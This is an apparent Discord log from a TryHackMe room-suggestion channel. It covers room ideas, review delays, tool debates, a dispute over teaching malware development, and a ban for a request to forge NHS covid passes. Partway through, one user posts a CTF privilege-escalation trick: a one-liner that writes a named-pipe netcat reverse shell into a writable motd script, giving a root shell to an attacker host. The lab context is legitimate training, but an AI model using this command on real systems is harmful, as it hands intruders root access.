drowsy solstice
#

Is there any interest in more Blue Team type of rooms? For example, how to secure your OS & Apps to DoD standards?

native raptor
#

There's an entire team of Blue Team content devs 😄

#

Plenty more Blue Team content coming soon™️

drowsy solstice
#

I'd like to contribute to that Blue Team content 😉

#

I am working on a room for using the DoD STIG to secure your OS and/or App; but wasn't sure if that would step on any existing rooms

#

Mainly because I get asked about it enough, I'd rather build a room once and point folks to it (BSides events, etc).

#

Don't want to put something out there that's already in the works though

native raptor
#

Check out the blue team pathway -- that's got a plan of a lot of the currently planned blue team walkthroughs. If it's not in there then it's probably a good one to go with :)

drowsy solstice
#

Appreciate the advice @native raptor , I'll keep working on the room and see if it has a fit anywhere.

drowsy solstice
#

Do you have a link for those rooms? I'll do some searching, I'm sure I can find them; thanks!

#

Of course I'm not on a subscription right now, so that makes it hard to view the room contents haha

drowsy solstice
# karmic raven Hardening Basics 1 & 2

That covers very specific Ubuntu configurations and some firewall topics, but not an actual framework to use for any OS, web app, firewall, router, etc. Good rooms though! What I'm working on would be on the same topic, just a more extensive review of the topic.

#

@karmic raven Could I DM you the introduction text of the room, see if it would fit?

karmic raven
hoary shard
marble currentBOT
#

Gave +1 Rep to @cedar echo

royal prawn
#

Cuz purple is better, I think

karmic raven
royal prawn
#

Oh, I was just making a commentary on how it's all the rage right now

#

Probably for good reason though, as it drives active results

slender turtle
#

Integer overflows

cursive blaze
#

Hello, i have created a room 10 days ago. And i am waiting for the possibility to became Public. How much time do i have to wait ?

somber crow
cursive blaze
somber crow
#

With the jr link yes.

cursive blaze
#

Thank you 💯
@somber crow

marble currentBOT
#

Gave +1 Rep to @somber crow

grand estuary
#

I'd love some more OSINT rooms

indigo mist
#

Maybe a Security Onion room? I don't know if it's possible. But you can really get lost in that if you don't know what you're doing 🙂

copper olive
#

Android petesting room. Most of us don't have powerful computers to emulate android environment for practice, if you can make an online machine it would be great.

#

2. Room on wine windows exe runner for linux. I want to do buffer overflow without testing on seperate windows environment instead using wine on my same kalil machine.

native raptor
native raptor
copper olive
native raptor
#

Again, as a general rule, it isn't used.
Wine is old, and only emulates x86 to boot.
It is used by hobbyists emulating Windows programs on Linux for fun.

In a professional environment you would have access to Windows directly, which is what you would (and should) be using.

#

No point in teaching things that won't help professionally 🤷‍♂️

slender turtle
#

CSV Injection room?

ashen laurel
#

Hi

atomic glade
#

A Port Knocking room based around a shop that sells Doors

native raptor
#

Ew, not more port knocking

forest summit
#

more rooms on owasp zap

sudden garnet
forest summit
#

well learning how to use it for all of the basic stuffs in comparison to how the burp module teaches you burp

#

and then some more advanced stuff after that

native raptor
#

I.e. head honchos are not going to commission content on a tool that won't be used professionally (except in very rare circumstances)

forest summit
native raptor
#

Burp Pro especially is infinitely more powerful than Zap.
Burp Community is arguably on a similar level, but even then it's still more stable

forest summit
# native raptor Being a lot more fully featured, a lot less buggy, a lot easier to use, and yes,...

shadow finds zap more fully featured then burp community, buggy yes because it crashes if shadow tries to set it to dark theme, easier to use is up to preference, more support is a definite thingy....
just having more options for how to do things is very helpful as it also helps in understanding how things work on a deeper level...
burp pro might be the best but nearly each and every tryhackme user are not going to get it just for personal use and probably putting it as a business expense for more strongly targeted pentesting and not ctfs

native raptor
forest summit
#

fair

#

shadow is more trying to debate why zap could become more like industry standard if there was more information available

#

but this channel is probably not for that so lets just drop it and see if someone is willing to do more owasp zap rooms if they want

native raptor
#

And you said it yourself -- Zap is unstable. Burp is not.

forest summit
native raptor
#

I mean, it's possible to get GDB to segfault 🤷‍♂️
You can make anything crash if you try hard enough

forest summit
#

magic sysrq for the win

somber crow
quartz lynx
#

Hi, it would be great if there was a learning Path for Reverse Engineering, which includes C/C++ basics to advance, then assembly basics and intro to memmories and basics of reverse engineering to advance

cinder mesa
#

Hello, Are there any plans for an OSCP prep path?

modest trail
cinder mesa
#

@modest trail Ah, Thank you for the info

marble currentBOT
#

Gave +1 Rep to @modest trail

unkempt mason
#

Hi guys I really love THM and would love to see some Hardware hacking rooms, atleast the basics other than assembly !! is there any plans on it

slender turtle
#

using procdump to harvest credentials from lsass.exe both with/without mimikatz would be a very sicc room

pseudo hedge
karmic raven
pseudo hedge
karmic raven
marble currentBOT
#

Gave +1 Rep to @karmic raven

supple plank
#

You guys should add a room for people to show off there PC setups. It might be cool

cedar echo
#

this is for THM room ideas

supple plank
#

Oh okay! i was thinking room as in discord channel

brisk tinsel
#

a mock dsp hacking room - something like a QSC DSP. compromise the shell, interact with the program to record audio (simulated) -- listen to audio for clues -- simulating eavesdropping on a conference or something

tacit anvil
#

Hi guys ! I wanted to share with you and alternative way of privesc on BountyHacker room

#

All the writeups point at beeing able to run 'tar' as sudo

#

however, you can also attack the fact that /etc/update-motd.d/00-header is writable

#

so you run the following command

#

echo -ne '#!/bin/sh\n\nrm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | /bin/nc $IP $PORT >/tmp/p' > /etc/update-motd.d/00-header

#

being $IP your atacking IP machine and $PORT whichever port you want to listen on

#

then you start a netcat listener on your machine on the specified port

#

and you log with ssh again on the atacked machine and you have a reverse shell as root on your machine

flat citrus
cedar echo
cedar echo
#

Maybe once I get home, mobile sucks for threads

sturdy bramble
#

i have an idea

#

what if the koth page doesnt show what machine it is running

#

but the players have to figure it out

somber crow
#

@sturdy bramble That makes very little difference. You'd find it out in a few seconds of port scanning

somber crow
#

Some of the KoTH machines have that, but it's a lot of work to build dynamic KoTH machines. You'd need a whole new set for that.

somber crow
#

Fortune, Hogwarts, and Hackers are all dynamic machines

tacit anvil
#

Could we get an option of switching to 'Dark Mode' on the website? Would really help and save our eyes...

somber crow
forest summit
#

room that uses CVE-2021-44228(log4j exploit thingy) to attack a server of minecraft or some other application in some way....

sage lodge
forest summit
sage lodge
#

one of my friends actually made a YouTube video demonstrating the use of the exploit in minecaft.
Its quite powerfull

forest summit
native raptor
cedar echo
#

It may or may not be in progress

broken echo
#

Hey, I was wondering if it would be cool to have an AoC type of event with increasing difficulty per challenge?

icy trellis
#

HOTH was the event that THM did which had increasingly harder rooms.

As TryHackMe is a beginner learning platform, usually the events that we have are beginner friendly. While I do love to see people tackle really hard challenges, in my opinion I’d prefer if everyone could have a chance at the rewards from an event, especially if the rewards are similar to the ones given out at AOC.

broken echo
#

I mean, it could be without rewards.. just for the challenge as is

#

I suppose that would be just another room/CTF

#

So yes, I didnt think this through as far as I think I did 😅

deep sentinel
#

are there any rooms that go through the process of finding an exploit?

native raptor
deep sentinel
#

cool thanks, will join it in a minute

#

@native raptor just reading over it and it looks be exactly what i was looking for, thanks 🙂

marble currentBOT
#

Gave +1 Rep to @native raptor

native raptor
#

Np 🙂

slow fjord
#

Why are there no badges for completing paths ?

tacit anvil
somber crow
slow fjord
#

ok, sent 👍

tired fjord
#

i am an AWS Community Builder and i have a room idea that i wanna work on but i need a mentor
who should i contact

sudden garnet
#

mentor for what?

tired fjord
#

mentor to guide me while making the room

#

maybe we can make a learning track

tired fjord
rapid kelp
#

Who could I contact with about "Intro to Pwntools" room? @graceful crane I have several ideas I think would improve the room and make it even more worthwhile for beginners

graceful crane
obtuse whale
#

Hello, just wondering if there is a cloud basics or cloud sec PATH in the works?

native raptor
#

Mayyyyyybe chceyes

obtuse whale
#

cool 🙂 I would be super interested in that

wicked mural
#

Hi guys i'm in interested in building a room. I just have a quick question. If ever I get to export a vm then I'm working on creating a vulnerable website then place the website in the html/www/var directory from where usually we can deploy a site using a server. Then should I just go and upload the vm in tryhackme? I'm still pretty new with the process of creating a room but very interested in creating one. Thanks. 🙂

native raptor
#

And yes, when it's ready, just export to .ova and upload

wicked mural
marble currentBOT
#

Gave +1 Rep to @native raptor

plain dawn
#

Task 5 needs some reworking, as well as some answers for Task 7

karmic raven
native raptor
#

But yeah, RPMetasploit is EOL @plain dawn

deep epoch
#

A room about how to make rooms on THM

native raptor
#

Pretty sure about three people have tried that already

#

I, uh, can't remember what happened

plain dawn
#

Thanks for the context!

forest summit
#

so the faq is not good enough on how to make rooms then???

#

or john hammonds video where he creates a room???

true robin
#

I don't know if we need a room to explain how to make rooms, but better documentation, and clearly set expectations would be nice. I was surprised to find that when you submit a room it can take weeks if not longer just to have it reviewed and published.

native raptor
#

Does during AoC

somber crow
#

If there was a paid room review team then setting expectations would make sense.

cunning thunder
true robin
# cunning thunder What kind of expectations are you referring to? As to the review time, this is d...

Ya. That isn’t documented anywhere. I wrote a log4j challenge room and submitted it before others, and mine hasn’t even been looked at a week later. I understand the backlog now, but at the time, based on what I read to build the room I had no idea that it could take weeks if not longer to release room on THMs schedule. I’m not bitter or anything, but had I known my room wouldn’t be accessible publicly for weeks I wouldn’t have rushed to complete it.

#

I was trying to add value to THM during a time when log4j was in the media.

#

Anyways, just an unexpected bump in the road. I know for the future. Would be nice if that was better explained in the room docs to better align expectations.

cunning thunder
#

What is the expectation though, that you know how long it is going to take?

true robin
#

From what I gather it’s the time to review which is based on backlog, holiday schedules, room tester availability and what not… PLUS scheduling by THM on the release itself.

#

I still don’t know what is a “reasonable” time yet. I’ve been contacted and told they will be reviewing my room next week. I dunno if that’s early or late. I ASSUMED a typical release is a few days from setting to public. That was a bad assumption on my part. With no clear guidance it’s hard to gauge. I think docs with “best effort” timelines would be helpful.

#

As I think about the past, normally you guys release a couple of rooms a week, except during AoC. It’s unrealistic if room dev gets popular to expect a room to be released in a week or two. I could imagine your backlog getting far bigger and delays far longer at this pace. But there’s no guidance in any direction of what to expect.

#

Maybe in the FAQ just add “we typically review and publish new community-built room in X weeks, except during the holidays/AoC”

#

If that’s reasonable timeline.

cunning thunder
#

Given the variables, it is hard to estimate. Also, the process itself is in transition. I will take these points into consideration though. I appreciate your input. 🙂

true robin
#

No problem. I can envision this will get more complicated as more rooms get submitted and the community grows. If I can help in any way, let me know.

#

As it stands, I need more rooms published. I’ve only got a handful left to do and It’s gonna break my streak to 365. lol

cunning thunder
#

That's a case of having become the victim of your own success (completing all the rooms). 😄

native raptor
#

Requirements have been tightened a bit since which has raised the quality and reduced the backlog though

cursive panther
sand rapids
#

Anyone create room for how to create malware

icy trellis
sand rapids
icy trellis
#

But you could do that in a room that reverses malware, right?

#

Teaching users to create malware is an ethical dilemma for TryHackMe imo

sand rapids
marble currentBOT
#

Gave +1 Rep to @icy trellis

misty rivet
icy trellis
#

Yes, but it is about justification.
Think about the word "malware", it's simply a portmanteau of "malicious" and "software".

true robin
#

I dunno @icy trellis , I think the idea behind offensive tradecraft isn't a terrible idea for red team operators. We need to understand how to defeat security controls to conduct our work. I write exploits as part of my job. You may call them "malware" because I am getting around things by maliciously affecting how the system and apps work. When denotated though, it doesn't do PERMANENT or DESTRUCTIVE harm, unless its specifically in scope to do so. I don't believe we should be teaching how to HARM things, but I do think things like AV/AM evasion, AMSI bypass, ROP chaining and SEH protection bypass are all valuable pursuits in learning.

icy trellis
#

Malware and exploits are not the same lmao

true robin
#

Thing is, there are far more groundwork that has to be instilled in people before fretting about this. Most don't even know how to do basic overflows to get to that point.

#

Are you trying to tell me an exploit with a payload to do something to interrupt the way a computer or app functions that DOESN'T cause permanent damage ISN'T malware?

icy trellis
#

You’re taking this so far out of scope.

true robin
#

The original question was if THM should teach techniques for writing malware. It wasn't about writing criminalistic payloads for monetary gain.

icy trellis
#

Malware, according to the studying I did for Comptia Sec+, is usually created for monetary gain, damage or for a botnet system

#

Just because you create or use an exploit that unintentionally damages the system, doesn’t mean that you’re making malicious software to purposely damage someone’s computer

true robin
#

The idea of learning how to write custom shellcode for an RCE is a form of malware. That's not a bad thing if you are teaching how to defeat security controls under that scope.

icy trellis
#

If you actually step back and read why the user wanted malware rooms, you will understand

true robin
#

No. Malware is any software intentionally designed to cause disruption to a digital system, or otherwise infiltrate or exfiltrate data or resources from a target without the target's knowledge or consent.

icy trellis
#

I’m honestly done with this conversation, you’re ignorant and taking it out of scope.

Rooms that specialise in malware are very ethically problematic and not a path that TryHackMe should go down.

If you would like to continue this “discussion” take it elsewhere.

true robin
#

Wow. OK. Disappointing. But that's your choice. Why promote red team stuff, binary exploitation and even phishing if you aren't going to actually allow teaching of the fundamentals on writing shellcode, evasion and bypasses. I digress. I'll shutup now.

native raptor
#

Rooms teaching offensive tradecraft I can get behind. Rooms teaching malware dev (which is inherently malicious -- it's literally in the name) are a whole other story. By definition the intention behind malware is to cause damage

#

Important distinction to make. The former is worth doing. The latter is criminal

true robin
#

Ya, I was never insinuating THM should teach criminalistic behavior. But foundational learning on what we do on red team like evasion and bypass, for the sake of understanding the weaknesses in security controls should be fair game.

#

I have some ideas on room creation I wanna do on things like showing how to defeat ASLR with fuzzing for address leakage, or how to do AMSI/ bypassing to defeat default controls on more modern Windows. I’d hate to do that work and get denied because it’s used in malware.

long pike
#

Does anyone have any links to making your own room on Tryhackme. I have been interested in making rooms.

deep epoch
flat citrus
#

has anyone made a room on "hashcat on google colab"? If not Id like to make one if possible
why ?
because its really fast

deep epoch
#

is it actually fast?

flat citrus
# deep epoch is it actually fast?

I have an I7u 7th gen cpu
AMD radeon rx 500 gpu
16 ram
(laptop)
some hash took me ~20 min to crack (not a vm), it took hashcat 1:40 min

deep epoch
#

running it on gpu took you 20 mins?

flat citrus
#

yes

deep epoch
#

hmm

somber crow
#

Mobile GPU though...

flat citrus
hazy lake
#

Hi

versed mortar
#

Has there been discussion about more mobile sec/app sec rooms being introduced? I work in Mobile App Security and would love to know how to contribute.

coral obsidian
#

Integer overflow!

marsh anvil
#

anyone have pointers for hacking Greenpass/NHS qr code ?

somber crow
marsh anvil
#

i want to learn how to encode. Github had some repos on decoding

somber crow
marsh anvil
#

i want to experiment

somber crow
marsh anvil
#

for knowledge

somber crow
#

-ban @marsh anvil Trying to forge NHS covid passes, this is dangerous and illegal. People die from covid. Ban appeals are bans@tryhackme.com

marble currentBOT
#

🔨 Banned MarcoReus11#8554 indefinitely

balmy hamlet
#

HAMMER TIME!!!

somber crow
balmy hamlet
#

sorry

high nexus
#

Is it bad that that (stupid) request now makes me wonder about the tech and security of such authentication systems? I think some are a private/public key setup that requires rhe private to decode info from a public database? I think Estonia and India both have/tried respectively digital national ID systems. Facebook is likely looking into such too. I was surprised to find that Japan is trying to get rid of Hankos not switch to digital ones.

Anyway - a room on how physical authentication handshakes/verification work? Or is that too topical and not hackery?

somber crow
somber crow
cold plover
#

i am stuck at converting process of my vm machine
can anyone help!

sudden garnet
cold plover
cold plover
#

I think desktop

somber crow
cold plover
#

how?

somber crow
#

It's not supported.

cold plover
#

but i already uploaded once

#

and it succedd

#

*succeed

somber crow
#

Whether it's supported or not is largely kernel version based.

#

Use Ubuntu Server.
It will run a million times better too. There's nearly no reasons you'd need ubuntu desktop.

cold plover
#

oh

#

ok thanks

rotund axle
#

we need more foxes. because foxes are awesome.

cold plover
#

how to copy and paste things in ubuntu server

#

?

tacit anvil
cold plover
#

?_?

somber crow
marble currentBOT
#

Couldn't find the specified role

somber crow
#

You've got a new channel where you can ask room creation related questions. Please ensure that you do your research first.

cold plover
#

ok thanks

rotund axle
#

🦊❤️

#

every second is second of the fox though.

pearl silo
#

even with the writeups, these year of the <insert animal here> were one of the toughest rooms I completed(made me feel like the creator personally hated meNotLikeThis )

native raptor
#

Next one will be fun, as soon as I find time to finish it

near sand
#

Year of the Rabbit is tagged "Easy". Maybe I'll start there 😂

pine grail
#

As Burp Community Edition (At least in v2021.10.3) offers an integrated, pre-configured browser, it might be beneficial to update the info for https://tryhackme.com/room/rpburpsuite, 'cause I spent way too long to get it running in FF with FoxyProxy while only wanting Burp to proxy traffic to 10/8 nets.

native raptor
pine grail
#

But hey, as long as they work, it's free XP!

#

... Please do not tell me there is a big banner somewhere.

native raptor
#

There is not.
Complete Beginner path just generally is deprecated in favour of Jr Pentester though, just as an fyi

pine grail
#

Ah. Well, good. That clears stuff up.

marble currentBOT
#

Gave +1 Rep to @native raptor

native raptor
#

Np 🙂

hard yew
#

Who would I have to DM to pitch a new room idea?

native raptor
#

No one. You can make it yourself -- anyone can make a THM room 🙂

fossil granite
#

Documentation

hard yew
native raptor
#

Just ask in here then :)

hard yew
#

Would you think a room on ethics could fit into THM scope

#

It would kind of go into some ethical arguments (which are philosophical) and explain the difference between legality and then at the end explain how legality and ethics often go hand in hand

native raptor
hard yew
#

I was also wondering if it's for the reviewing team or for the viewer

native raptor
#

It's for... no one

#

Just leave 'em all blank

#

Also

#

-arole @hard yew Creators-Lounge

marble currentBOT
#

➕ Gave the role Creators-Lounge to burneracc225#2087

hard yew
native raptor
#

Nope

plucky wigeon
#

is there a room where we can see how a site should be secured ?

cedar echo
cunning thunder
#

-arole 177529177707118592 Creators-Lounge

marble currentBOT
#

➕ Gave the role Creators-Lounge to RobertABT#2401

rotund axle
#

I'd like a free room or two going into how to use the angr framework for RE, tutorial style.

split schooner
#

Hi, I am planning to upload a room. So just wanted to know do we get paid if we submit a VIP Room?

icy trellis
#

You do not, no.

rotund axle
#

more foxes. yotf isn't enough.

fossil idol
#

anyone doing shaker

somber crow
fossil idol
#

okay thank you

balmy spindle
#

I have a problem

#

oops

somber crow
#

@balmy spindle this channel is for suggesting new tryhackme rooms.

balmy spindle
#

I know

woven crag
#

ahoy, i finally have an idea for a room and wanted to ask if there are any os-recommendations or if i can grab the latest ubuntu lts and i'm good to go?

modest trail
marble currentBOT
#

Gave +1 Rep to @modest trail

cosmic remnant
#

Is there a way to find rooms that are cloneable by searching to use as a starting point when creating one?

#

Also read that a way to implement dynamic flags might be in the works? Is that something that might be available soon, a process that runs like the koth service to get valid flags for the session?

somber crow
cosmic remnant
#

Ahh ok. Thank you.

#

I have other ideas for dynamic flags but wanted to check first instead of creating something .

somber crow
cosmic remnant
#

Yes, I like his rooms and I had the same thought process for mine.

somber crow
#

Dynamic flags are probably not worth it outside of challenges, and even then outside of challenges where there are high value prizes.

dim flicker
#

Hi @steady rose, I enjoy your Searchlight - IMINT and I managed to complete all the tasks. Just to inform you that the last task, that hotel has already demolished for new development. I’m the local so immediately I know where the place is. Anyway, I hope you have enjoyed your stay here. 😊

steady rose
marble currentBOT
#

Gave +1 Rep to @dim flicker

graceful rivet
#

Hi, is there any tutorial or a guide how to create a room on THM (ie. how to use different features like, split window etc., or network map like in wreath, holo)?

soft hamletBOT
native raptor
#

None of the things you've mentioned there are possible for most users though

#

Split window is either NoVNC/Guacamole into a machine (which requires more perms to setup than general users have), or static sites, which are an internal dev only thing

#

Networks are an outright "this requires one of the site admins (i.e. Skidy or Ashu) to set up and maintain"

cunning thunder
cosmic remnant
#

Not sure. I was search around to see if there was an api or something I missed and saw a conversation or thread where someone had mentioned it was being looked into.

#

They made it sound like it might be available sometime this year.

cunning thunder
marble currentBOT
#

Gave +1 Rep to @native raptor

past parcel
#

I have an idea but it isn't a room idea -it's to add Active Directory to the skills matrix. It's somewhat in line with the Windows Exploitation, however not really. What does the THM team think? Regardless, thank you so much for the skills matrix, I think it was a really cool addition to the dashboard EDIT: Didn't know where to put this. If there is some place better, lmk.

icy trellis
#

Your best bet would be #feedback-and-ideas but I personally don’t think it should be on there.

All windows exploitation is Active Directory but not all Active Directory is windows exploitation.

While it’s good to be semi-specific with the skills matrix, homing into specific skills, such as the exploit of a single service, is too specific to be considered for the matrix.

#

I hope I make sense

native raptor
#

Wait, what?

#

Not all Windows exploitation is Active Directory -- by a long shot 😆
Not all Active Directory is Windows exploitation either -- you can get Linux into AD quite easily too.

It's also a huge area in its own right. AD is a massive part of infrastructure hacking, and attacking AD misconfigurations and services is completely different from attacking Windows as an operating system

icy trellis
#

I'll be honest I'm trying to read what I wrote but it honestly don't sound like English 😛

#

I was trying to say that I don't think it should be categorised separately as it's own skill.

I presume that it isn't already due to the lack of rooms on AD currently (as the skills matrix api requires x amount to get to 100), but I still don't see it as it's own category.

imo Windows, Web, Linux, Networking and privesc all cover "AD" as an umbrella

native raptor
#

Yeaaaaaaaaah, they don't

#

AD attacks are their own very distinct category and set of techniques.

#

Like, for example, if I talk about GPO or delegation abuse, or even kerberoasting/ASREProasting (the two classics that everyone immediately thinks of with AD), those don't fall into any of those categories -- and those are just a couple of examples. None of them can be fit into Windows generally, Web, Linux, or Networking. They can kinda come under privesc, in some situations, but that's not really their objective. Regardless, they (and many others) are techniques that can only be used in an Active Directory environment.

#

And that's without even getting into how AD actually works or the underlying features behind it, which, again, are definitely not covered under any of those other categories

wet laurel
#

Fuzzing room pls sir

#

🙏🏽🙏🏽🙏🏽

ocean pond
#

@nocturne prairie
I suspect spam

#

Or @cedar echo

nocturne prairie
#

Certainly off topic. @tacit anvil I've nuked that link, as it looks to obe spam and off topic.

ocean pond
sudden garnet
#

any plan for a room on these techniques muir? 👀

native raptor
#

I've genuinely been considering it in the last few days

azure nymph
#

One that I cannot find, a room geared around teaching Firewalking.

native raptor
#

So, we are a go as soon as I find the time to write the room

sudden garnet
#

ooooh i'm v excited for that 😌

tacit anvil
#

Hello everyone

lunar spruce
#

Hello

surreal cloak
#

hello

surreal cloak
#

Hey could I make a room recommendation

#

I recommend they make a room dedicated to learning python skills for hacking. It's very hard for the beginner to learn modules like scapy that are very useful for making scripts, and I think a course on that could be great

karmic raven
surreal cloak
#

hmm that seems good, unfortunantely I dont have the premium content but maybe I can crate a free room for that more of an introduction to python for hacking

#

socket programming

#

but scapy should be the main focus as it automates a lot of wifi features and allows a lot of people to make scary and powerful scripts on their own

tender vortex
#

Hi there, who can I talk to regarding publishing a room? I think it is ready for final review.

native raptor
tender vortex
marble currentBOT
#

Gave +1 Rep to @native raptor

glass sentinel
#

I saw this recently, and I can’t remember if there are any really solid API based rooms on TryHackMe. I could be wrong but I thought this would be super helpful to use for one. https://portswigger.net/daily-swig/introducing-vapi-an-open-source-lab-environment-to-learn-about-api-security

The Daily Swig | Cybersecurity news and views

Platform aims to educate security professionals on the challenges of securing modern web APIs

tacit anvil
#

For Introductory Networking Task 7, I think it should allow MM/DD/YYYY as well (Not just DD/MM/YYYY). Not really a big deal, but at first I thought I entered the date wrong, but then I remembered y'all write the date differently across the pond. This is for the question, "When was the facebook.com domain first registered?".

#

or maybe put a note stating format in DD/MM/YYYY

karmic raven
#

Specified in the hint. @native raptor might be better to just put that in the question?

tacit anvil
#

ahh I see, that was my bad then. I try to avoid the hints

tender vortex
coral obsidian
wary stump
#

ignore this lol, trying to find the channel ;-;

coral zodiac
somber crow
coral zodiac
marble currentBOT
#

Gave +1 Rep to @somber crow

tacit anvil
#

Maybe a room about Cloud Security? As Cloud grows up and becomes a more and more standard technology, I think there should be a room for Cloud Security. I already saw the room on Cloud Technology

ruby berry
#

Basic computer architecture room? Handling things like cpu design, instruction sets, fetch-execute cycle, etc

tacit anvil
#

in the skill tree the list of rooms that matter to grow

woven kelp
ruby berry
woven kelp
ruby berry
#

Unless you're some frontend dev xd

pine thicket
#

Room Ideas: A/V evasion techniques on windows (msbuild, InstallUtil, rundll32, regsvcs, registry, etc) to include Applocker bypasses; powershell script obfuscation techniques/bypasses & execution techniques. AMSI bypass techniques and script development; windows oneliners for remote downloads and execution; Rubeus everything (all kerberos attacks).

somber crow
#

Have you done Holo?

pine thicket
coral zodiac
#

Are there any Nessus rooms other than the basic intro included in the Cyber Defense learning path?

karmic shore
#

All I want for Christmas is the paid content to be written in coherent English and stop relying on unversioned external resources that constantly change 🙏

coral obsidian
pearl silo
#

He prolly means links or github repositories that have been dead for a while and are still referenced

coral obsidian
pearl silo
#

👀 , people I are lazy

#

Or me I guess

karmic shore
#

To be fair not all actually paid rooms but if they're on the official learning paths I kinda expect some standard of quality

#

You don't really learn anything by searching forums and reading 'oh yeah you actually need to put some other thing in the box instead of what it actually says'